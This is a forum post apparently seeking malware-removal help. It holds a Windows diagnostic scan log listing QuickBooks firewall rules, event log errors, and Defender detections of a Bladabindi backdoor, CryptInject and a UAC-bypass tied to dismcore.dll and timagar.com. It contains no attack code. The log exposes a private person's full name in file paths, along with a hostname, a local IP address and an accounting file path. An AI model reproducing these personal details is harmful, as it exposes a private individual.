FirewallRules: [{900A494F-59CA-4732-A8F2-EC96BF65117C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an
SAP affiliate company)
FirewallRules: [{E57955F2-C2BA-40FB-9652-459C8201A8DD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an
SAP affiliate company)
FirewallRules: [{815EC1F8-75F8-474C-91E1-B851E05D2587}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{00B76FDF-7EDA-41D3-9491-0248692CAD6E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{A6E76912-0A6C-42E1-9EA3-C6A62D93F382}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{EDB6365B-6CE6-4801-8441-76F24FC14901}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{D4B668C7-4D2B-4324-A583-3DB8355FB969}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{7BBF55F9-D3FC-43ED-AA3D-538EA2BFEC70}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{AD31A9CC-C37B-47E7-91C3-71DC0EF39E5B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit,
Inc.) [File not signed]
FirewallRules: [{80DA2377-4D0A-4A8D-9658-6C54F2B6676D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit,
Inc.) [File not signed]
FirewallRules: [{32CF29BA-410D-4577-AB27-39F4595AACA4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{C574FD0B-30FB-47C5-ABF4-4878BF9EE923}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{F378B3E5-6E16-418E-B93F-8F9AE47788D3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{6081AA08-D332-46B4-A7AF-1B32C2D815F7}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{5B267C41-DCA2-4C52-98CA-91EF4A122F37}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{9BBA1B7A-AD84-48B6-AD18-A37E6DF429AE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{7FE3B23E-C3A6-4E6C-B66D-A1298E3D1BC7}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{8FC63164-A99F-44FE-A95A-CE9E77D7606E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{656BA272-51B9-47E7-9266-B860A68FE30D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{C2AECAF1-7B0C-4A78-AF50-C907CD3AEA23}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{40BEB16E-972A-406E-8958-5DD29629E667}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{362BFB84-DD8D-41EA-9B0A-A2543D8C113B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{C9F7EB02-CABB-4E34-B559-07A68D96C128}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{C56D2DB4-F018-43CF-8BA0-552A942055CF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{0443D1DB-8AC4-4860-B8D8-7D7CE906FEB1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{4E08147C-B286-40E3-8E99-41DC78FAB54E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{661270D3-1275-4409-B169-80F64214DDFB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{0DF7B383-71E7-4158-B9F3-59F26F1BEE0F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{0E6D62FB-0F41-4D85-94C6-0D68A6683ABB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{5450D652-BD0C-41AF-97D0-51FF49667D55}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{9CCB308A-C925-496A-AD4E-55FC1A92A23C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{C15C569D-71D8-4AAD-AB62-0717C4055D76}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{6C064A64-A6B1-4647-86BF-76473F9A7420}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{AD887500-B4E4-40B8-AB40-BF8A801265A1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{7B87E4EE-59E5-4200-B3F1-B3B610A0E198}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{4E6996B1-8F52-48E6-9ECF-BEC36C1D3EDE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{2C53049D-6015-43C2-BA8D-153FE3A2DD5C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{2FF8A498-A5CC-432F-9995-3E56AA82F050}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{4FCBF5AE-5F40-4EE8-8C15-A6E31E2DF734}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{3085921B-F6AE-4BCB-9AA4-B463983204C2}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{4C8CC311-3F98-41F8-A660-12AE58942448}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{05794537-CB6D-441F-A9D6-1FC5B471A04C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{E3C499AE-D0D0-4452-8625-50AB2E3EBF7A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{7F10A311-5142-4696-B0D4-1AA72AB8AEDD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{FACE0230-86C6-4163-821D-BAF2280DDF0E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{565D025D-B14F-4B46-A2E0-3522FA4F49E4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{C1B40447-2FA5-4EC2-87BC-A8466AE6C19A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{A7165A92-A88E-4940-B314-138AD7086775}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{5320A926-7413-4D53-AC70-7D0374649016}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{D66FC601-626A-4ADA-8269-8EDDFDB18B97}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{87D1E7D8-7B6A-4654-9F20-A65003E1E9AD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{88CD6A7E-A3AE-478D-BDFB-BD98CFF16766}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{0702F60D-B3B4-42B8-9DA1-EE8EBB0B40BC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{DF1C6D99-5E95-4713-AEDF-75914A2D4239}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{4E242E9A-D1C5-4B3A-9028-E0BC0AD9EF95}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{C32BF96D-3BA8-4BEB-83D7-073A8BBF7AB3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{CA3CDCE2-5FFB-4979-874E-E0727949BC5A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{CE21BA64-FE3D-45A8-B500-5639928FF995}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{D8C45C53-492C-47B3-9C79-A2A8E3B2259A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{90D53D47-BBDC-4306-87C1-A3783472D6E4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{D45406B1-FBA9-43F6-84A1-14790ED55486}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{604F7317-6DCF-4C2F-ADD6-794049F6F618}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{40A71165-7E0E-42DB-A143-4A778AF0A5F6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{C1D95454-84FE-4BCB-9BD1-DE811BADE17F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{6EFA8DB2-F8DC-459A-802B-F5BE5D5AFA6B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{394ADA8D-679A-4AAD-89CE-746CBC4DEA73}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{8F836148-2142-41B7-B6C1-FA07212FDC53}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E8B13576-EA96-459D-80A0-3A81EAA39D7B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{DB1423EB-BFB0-4BE4-A598-FA846AD72DB0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{F61B70B1-CF0D-47A7-A2CC-28D410FEF025}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{B235ECC2-463A-4C2B-B587-47BC3EE0B42A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{C282B0A2-F9A9-4B1C-8211-700598B2048D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{E6D541D7-6B5D-4621-9088-4A4F08B1D0C4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{F75E650E-DA3F-4D9A-8404-94F1B21EC890}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{12AE0005-5F5D-4F74-AFEB-21E3F9234F51}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{6BCE991F-1058-4032-A9F0-26A6DB559827}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{934CFBC7-D283-467C-B66A-DAEEB0AC8C6B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{28C48FBF-BCE1-498F-B439-C4C6293B8295}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{2C944978-4CA0-4F30-AE37-F4DE007FE024}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{8A43FAA2-7119-4A06-B00B-CB8C94F48B78}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{676AC531-6967-4780-BAAB-38F6C62AE38E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{E9359140-B0A3-46B0-B4B2-D7B7B5992CE9}] => (Allow) C:\Program
Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2DBA4F34-8C86-46A1-9783-9A15781DADFA}] => (Allow) C:\Program
Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{606894B9-3C5E-44EE-B918-AD14EA934C09}] => (Allow) C:\Program
Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A0E4901C-6C44-4BD8-9805-C981D10416DC}] => (Allow) C:\Program
Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{D2EF6376-3F06-49E3-96D0-83489E51100C}C:\program
files (x86)\mobikin\mobikin assistant for
android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files
(x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe
(UUMART LIMITED -> AndroidAssistServer)
FirewallRules: [UDP Query User{6FD277AE-9C2D-48F5-85F5-80EBE46ADD12}C:\program
files (x86)\mobikin\mobikin assistant for
android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files
(x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe
(UUMART LIMITED -> AndroidAssistServer)
FirewallRules: [{40A557CB-6DDE-4F48-A21E-693B97C5A43E}] => (Allow) C:\Program
Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
18-03-2022 12:29:20 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
Name: ExpressVPN TAP Adapter
Description: ExpressVPN TAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ExpressVPN
Service: tapexpressvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device".
This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: ========================
Application errors:
==================
Error: (03/22/2022 08:01:08 PM) (Source: Application Error) (EventID: 1000)
(User: )
Description: Faulting application name: bad_module_info, version: 0.0.0.0, time
stamp: 0x00000000
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x36991fe7
Faulting process id: 0x26dc
Faulting application start time: 0x01d83e4918b4e29c
Faulting application path: bad_module_info
Faulting module path: unknown
Report Id: 2a1ba1da-e322-4df4-8073-3fe554da0f1a
Faulting package full name:
Faulting package-relative application ID:
Error: (03/22/2022 03:42:30 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
WPR: calling ABORT_CLOSE
Error: (03/22/2022 03:42:25 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
WPR: calling ABORT_CLOSE
Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
DBConnPool::HandleConnectionError errorCode:-6069, dbCode:-103 from
file:'src\connpool.cpp' at line 1043 from function:'DBMgr::DBConnPool::init'
Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
Connection
String:CON=QBConnectionPool-Probe-QB_DESKTOP-ID6UD18_31;;DBF=C:\Users\Public\Documents\Intuit\QuickBooks\Company
Files\21E\KRH\KRH
21E.QBW;CommLinks="ShMem,tcpip(IP=192.168.1.2;TO=5;DOBROADCAST=NONE;port=63718)";ServerName=QB_DESKTOP-ID6UD18_31;DBN=e0f42625559a46f1ba0026e2ac1da2f5
Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
Connection Error:Invalid user ID or password
Error: (03/22/2022 03:40:41 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
DBConnPool::HandleConnectionError errorCode:-6069, dbCode:-103 from
file:'src\connpool.cpp' at line 1043 from function:'DBMgr::DBConnPool::init'
Error: (03/22/2022 03:40:41 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "Intuit QuickBooks Enterprise
Solutions: Accountant 21.0":
Connection
String:CON=QBConnectionPool-Probe-QB_DESKTOP-ID6UD18_31;;DBF=C:\Users\Public\Documents\Intuit\QuickBooks\Company
Files\21E\KRH\KRH
21E.QBW;CommLinks="ShMem,tcpip(IP=192.168.1.2;TO=5;DOBROADCAST=NONE;port=63718)";ServerName=QB_DESKTOP-ID6UD18_31;DBN=319c8aad2ce34214be3f0ea3d5e76468
System errors:
=============
Error: (03/22/2022 02:26:36 PM) (Source: Service Control Manager) (EventID:
7034) (User: )
Description: The AMD User Experience Program Launcher service terminated
unexpectedly. It has done this 1 time(s).
Error: (03/22/2022 12:48:56 PM) (Source: Service Control Manager) (EventID:
7031) (User: )
Description: The Print Spooler service terminated unexpectedly. It has done this
1 time(s). The following corrective action will be taken in 5000 milliseconds:
Restart the service.
Error: (03/22/2022 09:30:26 AM) (Source: Service Control Manager) (EventID:
7000) (User: )
Description: The QBWCMonitor service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (03/22/2022 09:30:26 AM) (Source: Service Control Manager) (EventID:
7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the
QBWCMonitor service to connect.
Error: (03/22/2022 09:24:53 AM) (Source: Service Control Manager) (EventID:
7034) (User: )
Description: The AMD User Experience Program Launcher service terminated
unexpectedly. It has done this 1 time(s).
Error: (03/22/2022 08:54:03 AM) (Source: Service Control Manager) (EventID:
7034) (User: )
Description: The AMD User Experience Program Launcher service terminated
unexpectedly. It has done this 1 time(s).
Error: (03/18/2022 06:12:50 PM) (Source: Microsoft-Windows-WindowsUpdateClient)
(EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following
update with error 0x80073d02: 9NMPJ99VJBWV-Microsoft.YourPhone.
Error: (03/11/2022 07:10:49 PM) (Source: Service Control Manager) (EventID:
7034) (User: )
Description: The AMD User Experience Program Launcher service terminated
unexpectedly. It has done this 1 time(s).
Windows Defender:
================
Date: 2022-03-23 08:25:11
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted
software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:MSIL/CryptInject&threatid=2147764265&enterprise=0
Name: VirTool:MSIL/CryptInject
Severity: Severe
Category: Tool
Path: file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Windows\SysWOW64\cmd.exe
Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS:
1.361.529.0
Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8
Date: 2022-03-23 08:05:07
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted
software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:Win32/Bladabindi!ml&threatid=2147748148&enterprise=0
Name: Backdoor:Win32/Bladabindi!ml
Severity: Severe
Category: Backdoor
Path: amsi:_\Device\HarddiskVolume3\ProgramData\timagar.com
Detection Origin: Unknown
Detection Type: FastPath
Detection Source: AMSI
Process Name: C:\ProgramData\timagar.com
Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS:
1.361.529.0
Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8
Date: 2022-03-23 07:03:14
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted
software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:MSIL/CryptInject&threatid=2147764265&enterprise=0
Name: VirTool:MSIL/CryptInject
Severity: Severe
Category: Tool
Path: file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll;
file:_C:\WINDOWS\sysWOW64\dismcore.dll
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\SysWOW64\cmd.exe
Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS:
1.361.529.0
Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8
Date: 2022-03-23 07:03:11
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted
software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/UACBypassExp.S&threatid=2147739683&enterprise=0
Name: Behavior:Win32/UACBypassExp.S
Severity: Severe
Category: Suspicious Behavior
Path: behavior:_pid:2884:109623877976470; file:_C:\Users\Karin
Hostetler\AppData\Local\Temp\dismcore.dll
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS:
1.361.529.0
Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8
Date: 2022-03-23 07:03:11
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted
software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/UACBypassExp.S&threatid=2147739683&enterprise=0
Name: Behavior:Win32/UACBypassExp.S
Severity: Severe
Category: Suspicious Behavior
Path: behavior:_pid:2884:109623877976470; file:_C:\Users\Karin
Hostetler\AppData\Local\Temp\dismcore.dll
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS:
1.361.529.0
Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8
CodeIntegrity:
===============
Date: 2022-03-23 08:31:16
Description:
Code Integrity determined that a process
(\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load
\Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the
Microsoft signing level requirements.
Date: 2022-03-23 08:28:21
Description:
Code Integrity determined that a process
(\Device\HarddiskVolume3\Windows\System32\SIHClient.exe) attempted to load
\Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the
Windows signing level requirements.
==================== Memory info ===========================
BIOS: LENOVO IRKT59AUS 08/12/2016
Motherboard: LENOVO 0x36A017AA
Processor: AMD A10-7800 Radeon R7, 12 Compute Cores 4C+8G
Percentage of memory in use: 60%
Total physical RAM: 11211.6 MB
Available physical RAM: 4429.62 MB
Total Virtual: 15179.6 MB
Available Virtual: 4825.08 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:1831.17 GB) (Free:1638.81 GB) NTFS
Drive i: (My Passport) (Fixed) (Total:931.48 GB) (Free:794.08 GB) NTFS
\\?\Volume{0a324fcb-7035-4eb0-963e-8812003b095b}\ (WinRE_DRV) (Fixed)
(Total:0.98 GB) (Free:0.48 GB) NTFS
\\?\Volume{c4e33b6f-fe2f-47f0-a23e-427135013c69}\ (LENOVO_PART) (Fixed)
(Total:30 GB) (Free:17.24 GB) NTFS
\\?\Volume{e54d1db3-7d2c-4058-ac24-b883e5632ad8}\ (SYSTEM) (Fixed) (Total:0.25
GB) (Free:0.22 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: C3FB2441)
Partition: GPT.
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 16F2A91F)
Partition: GPT.
==================== End of Addition.txt =======================
Edited by Oh My!, 23 March 2022 - 03:14 PM.
* Back to top
--------------------------------------------------------------------------------
BC ADBOT (LOGIN TO REMOVE)
*
* BleepingComputer.com
*
* Register to remove ads
PLAY Top Articles Video Settings Full Screen About Connatix V156852 Read More
